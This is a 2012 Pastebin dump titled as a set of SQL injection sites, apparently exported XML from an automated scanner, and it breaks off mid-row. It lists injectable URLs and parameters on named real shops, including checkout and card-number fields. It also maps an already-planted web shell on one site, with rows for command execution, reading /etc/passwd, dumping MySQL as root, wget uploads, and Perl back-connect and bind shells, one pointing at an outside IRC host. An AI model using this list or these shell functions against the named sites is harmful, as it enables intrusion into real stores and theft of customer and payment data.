API tools faq
paste
Guest User

SQLi Sites & Vulnerabilities 6 [Tales from CyberSpace] Set T

a guest
Jun 5th, 2012
274
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 42.29 KB | None | 0 0
raw download clone embed print report
  1. SQLi Sites & Vulnerabilities 6 [Tales from CyberSpace] Set Tripping Pack
  2. -------------------------------------------------------------------------
  3.  
  4. - <ROOT>
  5. - <SiteVulList>
  6. - <VulRow>
  7. <ReferURL>http://www.4mua.com/shop/checkout_shipping.php</ReferURL>
  8. <Parameter>stastus_search</Parameter>
  9. <Type>POST</Type>
  10. <KWordActionURL>https://www.4mua.com/shop/privacy.php?action=search^stastus_search=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
  11. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  12. </VulRow>
  13. - <VulRow>
  14. <ReferURL>http://www.4mua.com/content/../shop</ReferURL>
  15. <Parameter>stastus_search</Parameter>
  16. <Type>POST</Type>
  17. <KWordActionURL>http://www.4mua.com/shop/privacy.php?action=search^stastus_search=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
  18. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  19. </VulRow>
  20. - <VulRow>
  21. <ReferURL>http://www.4mua.com/shop/index.php?cPath=1343&p_sort=1</ReferURL>
  22. <Parameter>p_sort=1</Parameter>
  23. <Type>String</Type>
  24. <KWordActionURL>Gifts</KWordActionURL>
  25. <Vulnerability>URL SQL INJECTION</Vulnerability>
  26. </VulRow>
  27. - <VulRow>
  28. <ReferURL>http://www.4mua.com/shop/shopping_cart.php^action=update_product</ReferURL>
  29. <Parameter>action=update_product</Parameter>
  30. <Type>String</Type>
  31. <KWordActionURL>Thuong</KWordActionURL>
  32. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  33. </VulRow>
  34. - <VulRow>
  35. <ReferURL>http://www.4mua.com/shop/advanced_search_result.php?pto=WCRTESTINPUT000002&dfrom=mm/dd/yyyy&dto=mm/dd/yyyy&categories_id=3&manufacturers_id=4&keywords=WCRTESTINPUT000000&pfrom=WCRTESTINPUT000001</ReferURL>
  36. <Parameter>pfrom=!S!WCRTESTINPUT000001!E!</Parameter>
  37. <Type>String</Type>
  38. <KWordActionURL>Warning</KWordActionURL>
  39. <Vulnerability>URL SQL INJECTION</Vulnerability>
  40. </VulRow>
  41. - <VulRow>
  42. <ReferURL>http://www.splits4you.com/products.php?id=22</ReferURL>
  43. <Parameter>id=22</Parameter>
  44. <Type>Integer</Type>
  45. <KWordActionURL>Fujitsu</KWordActionURL>
  46. <Vulnerability>URL SQL INJECTION</Vulnerability>
  47. </VulRow>
  48. - <VulRow>
  49. <ReferURL>http://www.splits4you.com/products.php?id=99999999</ReferURL>
  50. <Parameter>id=99999999</Parameter>
  51. <Type>Integer</Type>
  52. <KWordActionURL>Fujitsu</KWordActionURL>
  53. <Vulnerability>URL SQL INJECTION</Vulnerability>
  54. </VulRow>
  55. - <VulRow>
  56. <ReferURL>http://www.splits4you.com/products.php</ReferURL>
  57. <Parameter>min_price=99999999</Parameter>
  58. <Type>String</Type>
  59. <KWordActionURL>http://www.splits4you.com/products.php?max_price=WCRTESTINPUT000001&cooling_capacity=WCRTESTINPUT000002&heating_capacity=WCRTESTINPUT000003&submit=Filter&manufacturer=all&unit_type=all&cooling_star_rating=any&heating_star_rating=any&min_price=99999999</KWordActionURL>
  60. <Vulnerability>XPath INJECTION</Vulnerability>
  61. </VulRow>
  62. - <VulRow>
  63. <ReferURL>http://www.splits4you.com/products.php</ReferURL>
  64. <Parameter>cooling_capacity=99999999</Parameter>
  65. <Type>String</Type>
  66. <KWordActionURL>http://www.splits4you.com/products.php?heating_capacity=WCRTESTINPUT000003&submit=Filter&manufacturer=all&unit_type=all&cooling_star_rating=any&heating_star_rating=any&min_price=WCRTESTINPUT000000&max_price=WCRTESTINPUT000001&cooling_capacity=99999999</KWordActionURL>
  67. <Vulnerability>XPath INJECTION</Vulnerability>
  68. </VulRow>
  69. - <VulRow>
  70. <ReferURL>http://www.splits4you.com/products.php?manufacturer=1</ReferURL>
  71. <Parameter>heating_capacity=99999999</Parameter>
  72. <Type>String</Type>
  73. <KWordActionURL>http://www.splits4you.com/products.php?submit=Filter&manufacturer=all&unit_type=all&cooling_star_rating=any&heating_star_rating=any&min_price=WCRTESTINPUT000000&max_price=WCRTESTINPUT000001&cooling_capacity=WCRTESTINPUT000002&heating_capacity=99999999</KWordActionURL>
  74. <Vulnerability>XPath INJECTION</Vulnerability>
  75. </VulRow>
  76. - <VulRow>
  77. <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
  78. <Parameter>name</Parameter>
  79. <Type>POST</Type>
  80. <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000<>%3c%3e%253c%253e&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
  81. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  82. </VulRow>
  83. - <VulRow>
  84. <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
  85. <Parameter>email</Parameter>
  86. <Type>POST</Type>
  87. <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001<>%3c%3e%253c%253e&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
  88. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  89. </VulRow>
  90. - <VulRow>
  91. <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
  92. <Parameter>address</Parameter>
  93. <Type>POST</Type>
  94. <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002<>%3c%3e%253c%253e&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
  95. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  96. </VulRow>
  97. - <VulRow>
  98. <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
  99. <Parameter>postcode</Parameter>
  100. <Type>POST</Type>
  101. <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003<>%3c%3e%253c%253e&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
  102. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  103. </VulRow>
  104. - <VulRow>
  105. <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
  106. <Parameter>phone</Parameter>
  107. <Type>POST</Type>
  108. <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004<>%3c%3e%253c%253e&message=WCRTESTTEXTAREA000005</KWordActionURL>
  109. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  110. </VulRow>
  111. - <VulRow>
  112. <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
  113. <Parameter>message</Parameter>
  114. <Type>POST</Type>
  115. <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTINPUT000005<>%3c%3e%253c%253e</KWordActionURL>
  116. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  117. </VulRow>
  118. - <VulRow>
  119. <ReferURL>http://www.splits4you.com/images/products/revision.php?sqlman</ReferURL>
  120. <Parameter>host</Parameter>
  121. <Type>POST</Type>
  122. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?sqlman^host=WCRTESTINPUT000000<>%3c%3e%253c%253e&userid=WCRTESTINPUT000000&pword1=WCRTESTINPUT000001&login=login</KWordActionURL>
  123. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  124. </VulRow>
  125. - <VulRow>
  126. <ReferURL>http://www.splits4you.com/images/products/revision.php?sqlman</ReferURL>
  127. <Parameter>userid</Parameter>
  128. <Type>POST</Type>
  129. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?sqlman^host=localhost&userid=WCRTESTINPUT000001<>%3c%3e%253c%253e&pword1=WCRTESTINPUT000001&login=login</KWordActionURL>
  130. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  131. </VulRow>
  132. - <VulRow>
  133. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  134. <Parameter>command</Parameter>
  135. <Type>POST</Type>
  136. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&command=WCRTESTINPUT000001<>%3c%3e%253c%253e&cmd=command&submit=Execute&method=system</KWordActionURL>
  137. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  138. </VulRow>
  139. - <VulRow>
  140. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  141. <Parameter>log</Parameter>
  142. <Type>POST</Type>
  143. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^log=WCRTESTINPUT000000<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&cmd=Crippling been planted and you can use filename.php?ss=http://shell.txt?&submit=Create</KWordActionURL>
  144. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  145. </VulRow>
  146. - <VulRow>
  147. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  148. <Parameter>glob</Parameter>
  149. <Type>POST</Type>
  150. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^glob=WCRTESTINPUT000000<>%3c%3e%253c%253e&cmd=glob&dir=/home/timweb40/splits4you.com/images/products&submit=Show</KWordActionURL>
  151. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  152. </VulRow>
  153. - <VulRow>
  154. <ReferURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&cmd=zend&submit=Test&zend=/etc/passwd</ReferURL>
  155. <Parameter>zend=/etc/passwd</Parameter>
  156. <Type>String</Type>
  157. <KWordActionURL>zMTkBaNrQAAL</KWordActionURL>
  158. <Vulnerability>POST SQL INJECTION</Vulnerability>
  159. </VulRow>
  160. - <VulRow>
  161. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  162. <Parameter>zend</Parameter>
  163. <Type>POST</Type>
  164. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^zend=WCRTESTINPUT000000<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&cmd=zend&submit=Test</KWordActionURL>
  165. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  166. </VulRow>
  167. - <VulRow>
  168. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  169. <Parameter>loc_file</Parameter>
  170. <Type>POST</Type>
  171. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&rem_file=http://&loc_file=WCRTESTINPUT000002<>%3c%3e%253c%253e&submit=Upload&with=wget</KWordActionURL>
  172. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  173. </VulRow>
  174. - <VulRow>
  175. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  176. <Parameter>mysql_l</Parameter>
  177. <Type>POST</Type>
  178. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^db_server=localhost&db_port=3306&mysql_l=WCRTESTINPUT000002<>%3c%3e%253c%253e&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
  179. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  180. </VulRow>
  181. - <VulRow>
  182. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  183. <Parameter>db_query</Parameter>
  184. <Type>POST</Type>
  185. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&dir=/home/timweb40/splits4you.com/images/products&cmd=db_query&submit=Execute&db_query=WCRTESTINPUT000008<>%3c%3e%253c%253e</KWordActionURL>
  186. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  187. </VulRow>
  188. - <VulRow>
  189. <ReferURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&submit=Run&use=Perl&local_port=80&remote_host=irc.dalnet.ru&remote_port=6667</ReferURL>
  190. <Parameter>remote_port=6667</Parameter>
  191. <Type>String</Type>
  192. <KWordActionURL>dalnet</KWordActionURL>
  193. <Vulnerability>POST SQL INJECTION</Vulnerability>
  194. </VulRow>
  195. - <VulRow>
  196. <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
  197. <Parameter>ips</Parameter>
  198. <Type>POST</Type>
  199. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^ips=WCRTESTINPUT000000<>%3c%3e%253c%253e&ports=80&dir=/home/timweb40/splits4you.com/images/products&submit=Connect&use=Perl</KWordActionURL>
  200. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  201. </VulRow>
  202. - <VulRow>
  203. <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
  204. <Parameter>cmd</Parameter>
  205. <Type>POST</Type>
  206. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^cmd=WCRTESTINPUT000000<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&submit=Execute</KWordActionURL>
  207. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  208. </VulRow>
  209. - <VulRow>
  210. <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
  211. <Parameter>ftp_file</Parameter>
  212. <Type>POST</Type>
  213. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^ftp_server_port=127.0.0.1:21&ftp_login=anonymous&[email protected]&ftp_file=WCRTESTINPUT000003<>%3c%3e%253c%253e&cmd=ftp_file_down&loc_file=/home/timweb40/splits4you.com/images/products&dir=/home/timweb40/splits4you.com/images/products&submit=Download</KWordActionURL>
  214. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  215. </VulRow>
  216. - <VulRow>
  217. <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
  218. <Parameter>subj</Parameter>
  219. <Type>POST</Type>
  220. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^[email protected]&cmd=mail&dir=/home/timweb40/splits4you.com/images/products&[email protected]&subj=WCRTESTINPUT000004<>%3c%3e%253c%253e&submit=Send&text=WCRTESTTEXTAREA000000</KWordActionURL>
  221. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  222. </VulRow>
  223. - <VulRow>
  224. <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
  225. <Parameter>mysql_db</Parameter>
  226. <Type>POST</Type>
  227. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=WCRTESTINPUT000004<>%3c%3e%253c%253e&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
  228. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  229. </VulRow>
  230. - <VulRow>
  231. <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
  232. <Parameter>port</Parameter>
  233. <Type>POST</Type>
  234. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^port=WCRTESTINPUT000000<>%3c%3e%253c%253e&bind_pass=SnIpEr&dir=/home/timweb40/splits4you.com/images/products&submit=Bind&use=Perl</KWordActionURL>
  235. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  236. </VulRow>
  237. - <VulRow>
  238. <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
  239. <Parameter>ports</Parameter>
  240. <Type>POST</Type>
  241. <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^ips=109.169.70.134&ports=WCRTESTINPUT000001<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&submit=Connect&use=Perl</KWordActionURL>
  242. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  243. </VulRow>
  244. - <VulRow>
  245. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  246. <Parameter>e_name</Parameter>
  247. <Type>POST</Type>
  248. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^e_name=WCRTESTINPUT000000<>%3c%3e%253c%253e&cmd=edit_file&dir=/home/timweb40/splits4you.com/images/products&submit=Edit file</KWordActionURL>
  249. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  250. </VulRow>
  251. - <VulRow>
  252. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  253. <Parameter>test3_md</Parameter>
  254. <Type>POST</Type>
  255. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^test3_md=WCRTESTINPUT000000<>%3c%3e%253c%253e&test3_ml=root&test3_mp=password&test3_file=/etc/passwd&dir=/home/timweb40/splits4you.com/images/products&cmd=mysqlb&submit=Test</KWordActionURL>
  256. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  257. </VulRow>
  258. - <VulRow>
  259. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  260. <Parameter>rem_file</Parameter>
  261. <Type>POST</Type>
  262. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^dir=/home/timweb40/splits4you.com/images/products&rem_file=WCRTESTINPUT000001<>%3c%3e%253c%253e&loc_file=/home/timweb40/splits4you.com/images/products&submit=Upload&with=wget</KWordActionURL>
  263. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  264. </VulRow>
  265. - <VulRow>
  266. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  267. <Parameter>ftp_login</Parameter>
  268. <Type>POST</Type>
  269. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^ftp_server_port=127.0.0.1:21&ftp_login=WCRTESTINPUT000001<>%3c%3e%253c%253e&[email protected]&ftp_file=/ftp-dir/file&cmd=ftp_file_down&loc_file=/home/timweb40/splits4you.com/images/products&dir=/home/timweb40/splits4you.com/images/products&submit=Download</KWordActionURL>
  270. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  271. </VulRow>
  272. - <VulRow>
  273. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  274. <Parameter>from</Parameter>
  275. <Type>POST</Type>
  276. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^[email protected]&cmd=mail&dir=/home/timweb40/splits4you.com/images/products&from=WCRTESTINPUT000003<>%3c%3e%253c%253e&subj=hello billy&submit=Send&text=WCRTESTTEXTAREA000000</KWordActionURL>
  277. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  278. </VulRow>
  279. - <VulRow>
  280. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  281. <Parameter>text</Parameter>
  282. <Type>POST</Type>
  283. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^[email protected]&cmd=mail&dir=/home/timweb40/splits4you.com/images/products&[email protected]&subj=hello billy&submit=Send&text=WCRTESTINPUT000006<>%3c%3e%253c%253e</KWordActionURL>
  284. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  285. </VulRow>
  286. - <VulRow>
  287. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  288. <Parameter>db_server</Parameter>
  289. <Type>POST</Type>
  290. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=WCRTESTINPUT000000<>%3c%3e%253c%253e&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
  291. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  292. </VulRow>
  293. - <VulRow>
  294. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  295. <Parameter>db_port</Parameter>
  296. <Type>POST</Type>
  297. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=WCRTESTINPUT000001<>%3c%3e%253c%253e&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
  298. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  299. </VulRow>
  300. - <VulRow>
  301. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  302. <Parameter>mysql_p</Parameter>
  303. <Type>POST</Type>
  304. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=WCRTESTINPUT000003<>%3c%3e%253c%253e&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
  305. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  306. </VulRow>
  307. - <VulRow>
  308. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  309. <Parameter>mysql_tbl</Parameter>
  310. <Type>POST</Type>
  311. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=WCRTESTINPUT000005<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
  312. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  313. </VulRow>
  314. - <VulRow>
  315. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  316. <Parameter>dif_name</Parameter>
  317. <Type>POST</Type>
  318. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=WCRTESTINPUT000008<>%3c%3e%253c%253e&submit=Dump</KWordActionURL>
  319. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  320. </VulRow>
  321. - <VulRow>
  322. <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
  323. <Parameter>ip</Parameter>
  324. <Type>POST</Type>
  325. <KWordActionURL>http://www.splits4you.com/images/products/revision.php^ip=WCRTESTINPUT000000<>%3c%3e%253c%253e&port=80&dir=/home/timweb40/splits4you.com/images/products&submit=Connect&use=Perl</KWordActionURL>
  326. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  327. </VulRow>
  328. - <VulRow>
  329. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse</ReferURL>
  330. <Parameter>name=Aquafinesse</Parameter>
  331. <Type>String</Type>
  332. <KWordActionURL>Hydraulic</KWordActionURL>
  333. <Vulnerability>URL SQL INJECTION</Vulnerability>
  334. </VulRow>
  335. - <VulRow>
  336. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223^name=Aquafinesse</ReferURL>
  337. <Parameter>name=Aquafinesse</Parameter>
  338. <Type>String</Type>
  339. <KWordActionURL>CoverMate</KWordActionURL>
  340. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  341. </VulRow>
  342. - <VulRow>
  343. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=35</ReferURL>
  344. <Parameter>id=35</Parameter>
  345. <Type>Integer</Type>
  346. <KWordActionURL>Replacement</KWordActionURL>
  347. <Vulnerability>URL SQL INJECTION</Vulnerability>
  348. </VulRow>
  349. - <VulRow>
  350. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=273&name=Replacement%20Hot%20Tub%20Cover^TradeShop_1_ID_Add=273&TradeShop_1_Quantity_Add=1</ReferURL>
  351. <Parameter>TradeShop_1_Quantity_Add=1</Parameter>
  352. <Type>Integer</Type>
  353. <KWordActionURL>Super</KWordActionURL>
  354. <Vulnerability>POST SQL INJECTION</Vulnerability>
  355. </VulRow>
  356. - <VulRow>
  357. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=6&name=Swirl%20Away^TradeShop_1_Quantity_Add=1&TradeShop_1_ID_Add=6</ReferURL>
  358. <Parameter>TradeShop_1_ID_Add=6</Parameter>
  359. <Type>Integer</Type>
  360. <KWordActionURL>Antifoam</KWordActionURL>
  361. <Vulnerability>POST SQL INJECTION</Vulnerability>
  362. </VulRow>
  363. - <VulRow>
  364. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse^Submit=Go!&q=WCRTESTINPUT000000</ReferURL>
  365. <Parameter>q=!S!WCRTESTINPUT000000!E!</Parameter>
  366. <Type>String</Type>
  367. <KWordActionURL>Pleatco</KWordActionURL>
  368. <Vulnerability>POST SQL INJECTION</Vulnerability>
  369. </VulRow>
  370. - <VulRow>
  371. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse^Submit=Go!&q=1</ReferURL>
  372. <Parameter>q=1</Parameter>
  373. <Type>Integer</Type>
  374. <KWordActionURL>Above</KWordActionURL>
  375. <Vulnerability>POST SQL INJECTION</Vulnerability>
  376. </VulRow>
  377. - <VulRow>
  378. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse</ReferURL>
  379. <Parameter>q=99999999</Parameter>
  380. <Type>String</Type>
  381. <KWordActionURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse^Submit=Go!&q=99999999</KWordActionURL>
  382. <Vulnerability>XPath INJECTION</Vulnerability>
  383. </VulRow>
  384. - <VulRow>
  385. <ReferURL>http://uktubstore.co.uk/shop/filter_finder.php</ReferURL>
  386. <Parameter>len=99999999</Parameter>
  387. <Type>String</Type>
  388. <KWordActionURL>http://uktubstore.co.uk/shop/filter_finder_results2.php?button2=Search&len=99999999</KWordActionURL>
  389. <Vulnerability>XPath INJECTION</Vulnerability>
  390. </VulRow>
  391. - <VulRow>
  392. <ReferURL>http://uktubstore.co.uk/shop/filter_finder.php</ReferURL>
  393. <Parameter>len</Parameter>
  394. <Type>GET</Type>
  395. <KWordActionURL>http://uktubstore.co.uk/shop/filter_finder_results2.php?len=WCRTESTINPUT000000<>%3c%3e%253c%253e&button2=Search</KWordActionURL>
  396. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  397. </VulRow>
  398. - <VulRow>
  399. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=273&OPT_ID=0</ReferURL>
  400. <Parameter>OPT_ID=0</Parameter>
  401. <Type>Integer</Type>
  402. <KWordActionURL>Multipack</KWordActionURL>
  403. <Vulnerability>URL SQL INJECTION</Vulnerability>
  404. </VulRow>
  405. - <VulRow>
  406. <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=273^OPT_ID=0</ReferURL>
  407. <Parameter>OPT_ID=0</Parameter>
  408. <Type>Integer</Type>
  409. <KWordActionURL>Sundance</KWordActionURL>
  410. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  411. </VulRow>
  412. - <VulRow>
  413. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  414. <Parameter>cc_number</Parameter>
  415. <Type>POST</Type>
  416. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000<>%3c%3e%253c%253e&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  417. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  418. </VulRow>
  419. - <VulRow>
  420. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  421. <Parameter>cvv</Parameter>
  422. <Type>POST</Type>
  423. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001<>%3c%3e%253c%253e&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  424. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  425. </VulRow>
  426. - <VulRow>
  427. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  428. <Parameter>firstname</Parameter>
  429. <Type>POST</Type>
